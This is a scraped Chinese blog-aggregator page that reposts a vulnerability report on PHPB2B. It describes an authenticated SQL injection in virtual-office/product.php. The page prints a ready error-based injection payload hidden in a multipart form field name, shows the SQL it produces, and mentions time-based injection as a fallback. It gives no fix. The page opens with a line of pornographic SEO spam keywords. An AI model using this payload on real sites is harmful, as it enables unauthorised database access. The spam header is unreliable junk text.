日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php3绕过,PHPB2B注入#3(绕过过滤)

發布時間:2024/7/23 php 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php3绕过,PHPB2B注入#3(绕过过滤) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

PHPB2B某處注入

繞過過濾。

官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

詳細說明:

1.注冊企業會員。

2.注冊企業會員且通過審核。

發布產品。

漏洞文件。virtual-office/product.php

Content-Disposition: form-data; name="data[product][sort_id]"

Content-Disposition: form-data; name="data[product][name]"

...

...

post提交:Content-Disposition: form-data; name="data[product][sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"

執行:

SELECT sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,name,price,country_id,content,type_id,category_id,brand_id,status,tag_ids,cache_companyname,industry_id,area_id,member_id,company_id,modified,created FROM pb_thk_products WHERE id='-1'

漏洞證明:

本地測試開啟debug。程序默認不開啟debug,可延時注入。

總結

以上是生活随笔為你收集整理的php3绕过,PHPB2B注入#3(绕过过滤)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。